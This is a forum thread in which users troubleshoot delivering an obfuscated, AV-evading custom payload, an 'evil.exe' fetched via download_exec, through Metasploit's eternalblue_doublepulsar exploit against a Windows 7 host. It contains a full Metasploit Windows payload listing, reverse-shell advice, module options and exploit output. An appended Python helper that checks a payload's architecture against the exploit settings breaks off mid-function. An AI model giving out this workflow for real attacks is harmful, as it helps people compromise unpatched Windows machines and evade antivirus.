How to attach your own PAYLOAD in msf

Discussion in 'Sandbox' started by UrfinJuice, 23 Nov 2017.

  1. UrfinJuice

    UrfinJuice New Member

    Good afternoon, forum folks!
    Help me figure this out...

    The situation: I take Metasploit and pick an exploit, say eternalblue. As the PAYLOAD you can choose, say, meterpreter. The main problem is that this payload doesn't give a session, and I suspect the AV is blocking it. (Under test conditions, without AV, the session comes in.)

    The internet is full of articles about Shellter, Veil (a new version came out, by the way), msfvenom and so on. But everything I've read just generates and encodes the payload, and then, as they all write, it "is delivered to the victim machine" and launched.

    Now the question: how can I take an arbitrary payload (A) (for example a PowerShell one from Empire), run it through that same Veil, and then attach the resulting file (B) to an exploit, e.g. that same eternalblue?
    Please suggest; the more ways the better.

    P.S. I tried choosing the payload windows/exec just to pass command (A) to CMD. But with any value of CMD I get an error: the parameter value is not valid. Yet if that A is launched manually on the victim, the session comes in.

    P.P.S. Most of the standard payloads in msf already contain the instructions for creating a session, whether reverse or bind. I only need to deliver and launch my own obfuscated, encoded, etc. code.

  2. SooLFaa

    SooLFaa Members of Antichat

    Here we gooooo

    show payloads
    Code:
       windows/adduser                                                      normal  Windows Execute net user /ADD
       windows/dllinject/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
       windows/dllinject/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager
       windows/dllinject/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
       windows/dllinject/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/dllinject/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
       windows/dllinject/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)
       windows/dllinject/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/dllinject/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
       windows/dllinject/find_tag                                           normal  Reflective DLL Injection, Find Tag Ordinal Stager
       windows/dllinject/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
       windows/dllinject/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
       windows/dllinject/reverse_http_proxy_pstore                          normal  Reflective DLL Injection, Reverse HTTP Stager Proxy
       windows/dllinject/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
       windows/dllinject/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
       windows/dllinject/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager
       windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager
       windows/dllinject/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
       windows/dllinject/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/dllinject/reverse_tcp_rc4_dns                                normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/dllinject/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support
       windows/dllinject/reverse_winhttp                                    normal  Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
       windows/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution
       windows/download_exec                                                normal  Windows Executable Download (http,https,ftp) and Execute
       windows/exec                                                         normal  Windows Execute Command
       windows/format_all_drives                                            manual  Windows Drive Formatter
       windows/loadlibrary                                                  normal  Windows LoadLibrary Path
       windows/messagebox                                                   normal  Windows MessageBox
       windows/meterpreter/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
       windows/meterpreter/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
       windows/meterpreter/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
       windows/meterpreter/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/meterpreter/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
       windows/meterpreter/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
       windows/meterpreter/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/meterpreter/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
       windows/meterpreter/find_tag                                         normal  Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
       windows/meterpreter/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
       windows/meterpreter/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
       windows/meterpreter/reverse_http_proxy_pstore                        normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
       windows/meterpreter/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
       windows/meterpreter/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
       windows/meterpreter/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
       windows/meterpreter/reverse_named_pipe                               normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
       windows/meterpreter/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
       windows/meterpreter/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
       windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
       windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
       windows/meterpreter/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
       windows/meterpreter/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/meterpreter/reverse_tcp_rc4_dns                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/meterpreter/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
       windows/meterpreter/reverse_winhttp                                  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
       windows/meterpreter/reverse_winhttps                                 normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
       windows/meterpreter_bind_tcp                                         normal  Windows Meterpreter Shell, Bind TCP Inline
       windows/meterpreter_reverse_http                                     normal  Windows Meterpreter Shell, Reverse HTTP Inline
       windows/meterpreter_reverse_https                                    normal  Windows Meterpreter Shell, Reverse HTTPS Inline
       windows/meterpreter_reverse_ipv6_tcp                                 normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
       windows/meterpreter_reverse_tcp                                      normal  Windows Meterpreter Shell, Reverse TCP Inline
       windows/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP
       windows/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline
       windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager
       windows/patchupdllinject/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager
       windows/patchupdllinject/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
       windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/patchupdllinject/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
       windows/patchupdllinject/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)
       windows/patchupdllinject/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupdllinject/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
       windows/patchupdllinject/find_tag                                    normal  Windows Inject DLL, Find Tag Ordinal Stager
       windows/patchupdllinject/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
       windows/patchupdllinject/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
       windows/patchupdllinject/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/patchupdllinject/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager
       windows/patchupdllinject/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager
       windows/patchupdllinject/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)
       windows/patchupdllinject/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupdllinject/reverse_tcp_rc4_dns                         normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/patchupdllinject/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support
       windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
       windows/patchupmeterpreter/bind_hidden_tcp                           normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
       windows/patchupmeterpreter/bind_ipv6_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
       windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/patchupmeterpreter/bind_nonx_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
       windows/patchupmeterpreter/bind_tcp                                  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
       windows/patchupmeterpreter/bind_tcp_rc4                              normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupmeterpreter/bind_tcp_uuid                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
       windows/patchupmeterpreter/find_tag                                  normal  Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
       windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
       windows/patchupmeterpreter/reverse_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
       windows/patchupmeterpreter/reverse_ord_tcp                           normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
       windows/patchupmeterpreter/reverse_tcp                               normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
       windows/patchupmeterpreter/reverse_tcp_allports                      normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
       windows/patchupmeterpreter/reverse_tcp_dns                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
       windows/patchupmeterpreter/reverse_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/patchupmeterpreter/reverse_tcp_rc4_dns                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/patchupmeterpreter/reverse_tcp_uuid                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
       windows/powershell_bind_tcp                                          normal  Windows Interactive Powershell Session, Bind TCP
       windows/powershell_reverse_tcp                                       normal  Windows Interactive Powershell Session, Reverse TCP
       windows/shell/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager
       windows/shell/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager
       windows/shell/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
       windows/shell/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/shell/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
       windows/shell/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)
       windows/shell/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/shell/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
       windows/shell/find_tag                                               normal  Windows Command Shell, Find Tag Ordinal Stager
       windows/shell/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)
       windows/shell/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
       windows/shell/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager
       windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager
       windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)
       windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/shell/reverse_tcp_rc4_dns                                    normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support
       windows/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline
       windows/shell_bind_tcp_xpfw                                          normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
       windows/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline
       windows/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline
       windows/speak_pwned                                                  normal  Windows Speech API - Say "You Got Pwned!"
       windows/upexec/bind_hidden_ipknock_tcp                               normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
       windows/upexec/bind_hidden_tcp                                       normal  Windows Upload/Execute, Hidden Bind TCP Stager
       windows/upexec/bind_ipv6_tcp                                         normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
       windows/upexec/bind_ipv6_tcp_uuid                                    normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/upexec/bind_nonx_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
       windows/upexec/bind_tcp                                              normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)
       windows/upexec/bind_tcp_rc4                                          normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/upexec/bind_tcp_uuid                                         normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
       windows/upexec/find_tag                                              normal  Windows Upload/Execute, Find Tag Ordinal Stager
       windows/upexec/reverse_ipv6_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
       windows/upexec/reverse_nonx_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
       windows/upexec/reverse_ord_tcp                                       normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
       windows/upexec/reverse_tcp                                           normal  Windows Upload/Execute, Reverse TCP Stager
       windows/upexec/reverse_tcp_allports                                  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
       windows/upexec/reverse_tcp_dns                                       normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
       windows/upexec/reverse_tcp_rc4                                       normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/upexec/reverse_tcp_rc4_dns                                   normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/upexec/reverse_tcp_uuid                                      normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support
       windows/vncinject/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
       windows/vncinject/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager
       windows/vncinject/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
       windows/vncinject/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
       windows/vncinject/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
       windows/vncinject/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
       windows/vncinject/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
       windows/vncinject/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
       windows/vncinject/find_tag                                           normal  VNC Server (Reflective Injection), Find Tag Ordinal Stager
       windows/vncinject/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
       windows/vncinject/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
       windows/vncinject/reverse_http_proxy_pstore                          normal  VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
       windows/vncinject/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
       windows/vncinject/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
       windows/vncinject/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
       windows/vncinject/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager
       windows/vncinject/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
       windows/vncinject/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
       windows/vncinject/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
       windows/vncinject/reverse_tcp_rc4_dns                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
       windows/vncinject/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
       windows/vncinject/reverse_winhttp                                    normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
       windows/x64/exec                                                     normal  Windows x64 Execute Command
       windows/x64/loadlibrary                                              normal  Windows x64 LoadLibrary Path
       windows/x64/meterpreter/bind_ipv6_tcp                                normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
       windows/x64/meterpreter/bind_ipv6_tcp_uuid                           normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/meterpreter/bind_tcp                                     normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
       windows/x64/meterpreter/bind_tcp_uuid                                normal  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/meterpreter/reverse_http                                 normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/meterpreter/reverse_https                                normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/meterpreter/reverse_named_pipe                           normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
       windows/x64/meterpreter/reverse_tcp                                  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
       windows/x64/meterpreter/reverse_tcp_uuid                             normal  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/meterpreter/reverse_winhttp                              normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
       windows/x64/meterpreter/reverse_winhttps                             normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
       windows/x64/meterpreter_bind_tcp                                     normal  Windows Meterpreter Shell, Bind TCP Inline (x64)
       windows/x64/meterpreter_reverse_http                                 normal  Windows Meterpreter Shell, Reverse HTTP Inline (x64)
       windows/x64/meterpreter_reverse_https                                normal  Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
       windows/x64/meterpreter_reverse_ipv6_tcp                             normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
       windows/x64/meterpreter_reverse_tcp                                  normal  Windows Meterpreter Shell, Reverse TCP Inline x64
       windows/x64/powershell_bind_tcp                                      normal  Windows Interactive Powershell Session, Bind TCP
       windows/x64/powershell_reverse_tcp                                   normal  Windows Interactive Powershell Session, Reverse TCP
       windows/x64/shell/bind_ipv6_tcp                                      normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
       windows/x64/shell/bind_ipv6_tcp_uuid                                 normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/shell/bind_tcp                                           normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
       windows/x64/shell/bind_tcp_uuid                                      normal  Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/shell/reverse_tcp                                        normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
       windows/x64/shell/reverse_tcp_uuid                                   normal  Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/shell_bind_tcp                                           normal  Windows x64 Command Shell, Bind TCP Inline
       windows/x64/shell_reverse_tcp                                        normal  Windows x64 Command Shell, Reverse TCP Inline
       windows/x64/vncinject/bind_ipv6_tcp                                  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
       windows/x64/vncinject/bind_ipv6_tcp_uuid                             normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
       windows/x64/vncinject/bind_tcp                                       normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
       windows/x64/vncinject/bind_tcp_uuid                                  normal  Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
       windows/x64/vncinject/reverse_http                                   normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/vncinject/reverse_https                                  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
       windows/x64/vncinject/reverse_tcp                                    normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
       windows/x64/vncinject/reverse_tcp_uuid                               normal  Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
       windows/x64/vncinject/reverse_winhttp                                normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
       windows/x64/vncinject/reverse_winhttps                               normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

    Now, to answer the questions. Start with reverse_tcp. Change it to dns, https and so on.
    If the session drops, then good old windows/shell/reverse_tcp_dns

    Or maybe it's simpler to push VNC through? windows/vncinject/reverse_http
    Is the bitness right? windows/x64/exec

    Well, if you still want your own payload, then payload/windows/download_exec
    Or else.... write your own

    Skeleton example here https://github.com/rapid7/metasploi.../modules/payloads/stagers/windows/bind_tcp.rb
     
  3. vitrend (New Member)

    Are there people who know this field (exploits, payloads) and could finish this software, with masscan, automatic loading of exploits and so on?
     
  4. UrfinJuice (New Member)

    SooLFaa, thanks for the reply.

    Let me comment point by point...

    1. I have tried switching payloads, the session does not arrive, although, for example, the target host does allow requests to port 80 (http).
    2. windows/shell/reverse_tcp_dns - I will try it.

    3. Plain windows/vncinject/reverse_http does not fire. But if I first get a meterpreter session and then push vncinject through payload/inject, everything works. That option is not relevant here though.
    4. The target host is x86, I keep an eye on that.
    5. I had high hopes for payload/windows/download_exec. It is exactly what I need, but the session does not arrive. Although if I open the URL by hand from the target host, everything works fine.


    So for now we can narrow the question....

    1. Why does the session not arrive with payload/windows/download_exec?
    2. Why does windows/exec with the parameter CND=calc.exe throw the error "could not validate CMD"?
     
  5. SooLFaa (Members of Antichat)

    To answer these two questions I need the actual target.
     
  6. UrfinJuice (New Member)

    Target - Windows 7 SP1 x86, build 7601.
    Attacking host - Kali Linux 2017.3
    Exploit - eternalblue_doublepulsar
     
  7. VY_CMa (Green member)

    1) It is not the payload, it is the launch method. The AV catches any kind of injection into a process / detects reflective loading.
    2) CND=calc.exe
    It has to be CMD.
     
  8. UrfinJuice (New Member)

    1) AV is turned off. Besides, this very same exe, started by hand on the target, gives a session just fine. AV has nothing to do with it in this case.
    2) CND is a typo, I do enter it correctly. This is the error on the output - The following options failed to validate: CMD
     
  9. VY_CMa (Green member)

    1) Any Cyrillic in the path?
    2) Possibly it complains because of quotes
    Waiting for a screenshot of the filled-in parameters (SET CMD calc.exe....)
     
  10. UrfinJuice (New Member)

    1. http://192.168.137.128/evil.exe Again, the link works when opened by hand on the target.
    2.
    Code:
    Module options (exploit/windows/smb/eternalblue_doublepulsar):
    
       Name                Current Setting                                  Required  Description
       ----                ---------------                                  --------  -----------
       DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
       ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
       PROCESSINJECT       spoolsv.exe                                      yes       Name of process to inject into (Change to lsass.exe for x64)
       RHOST               192.168.137.130                                  yes       The target address
       RPORT               445                                              yes       The SMB service port (TCP)
       TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
       WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path
    
    
    Payload options (windows/exec):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       CMD       calc.exe         yes       The command string to execute
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    Result:

    Code:
    [*] 192.168.137.130:445 - Generating Eternalblue XML data
    [*] 192.168.137.130:445 - Generating Doublepulsar XML data
    [*] 192.168.137.130:445 - Generating payload DLL for Doublepulsar
    [-] 192.168.137.130:445 - Exploit failed: Msf::OptionValidateError The following options failed to validate: CMD.
    [*] Exploit completed, but no session was created.
    
     
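    An added example, not part of this thread or of Metasploit, for the point behind "Is the bitness right?" above and the TARGETARCHITECTURE / PROCESSINJECT options in the listing just posted: before firing the exploit, read the PE header of the file you intend to deliver (evil.exe here) and compare its architecture with the module settings. A file whose Machine field says x64 while TARGETARCHITECTURE is x86, or a 32-bit image aimed at a 64-bit process, will never produce a session through the exploit even though the same file runs fine when started by hand, which is exactly the symptom described in this thread. The PROCESSINJECT rule below only repeats the option text shown in the listing (spoolsv.exe for x86, lsass.exe for x64). The sample images are constructed in the block and are not loadable executables; `check_delivery` and `build_fake_pe` are names chosen for this example.

```python
"""Sanity-check a payload executable against eternalblue_doublepulsar-style module options.

Added example, not from the thread above. Parses the PE file header of the file you plan
to deliver and compares it with TARGETARCHITECTURE / PROCESSINJECT before you run the exploit.
"""
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C   # 32-bit x86 image
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # 64-bit x64 image
IMAGE_FILE_DLL = 0x2000            # Characteristics bit: image is a DLL, not an EXE


def pe_file_header(data: bytes) -> tuple:
    """Return (Machine, Characteristics) from IMAGE_FILE_HEADER; raise ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # offset of the PE signature
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # IMAGE_FILE_HEADER follows the 4-byte signature: Machine at +0, Characteristics at +18
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    characteristics = struct.unpack_from("<H", data, e_lfanew + 4 + 18)[0]
    return machine, characteristics


def pe_arch(data: bytes) -> str:
    """Map the Machine field to the x86/x64 names the module's TARGETARCHITECTURE option uses."""
    machine, _ = pe_file_header(data)
    if machine == IMAGE_FILE_MACHINE_I386:
        return "x86"
    if machine == IMAGE_FILE_MACHINE_AMD64:
        return "x64"
    raise ValueError(f"unsupported Machine value 0x{machine:04x}")


def pe_is_dll(data: bytes) -> bool:
    """True when the image is a DLL (must be loaded, cannot be started as a process)."""
    _, characteristics = pe_file_header(data)
    return bool(characteristics & IMAGE_FILE_DLL)


def check_delivery(exe: bytes, target_architecture: str, process_inject: str) -> list:
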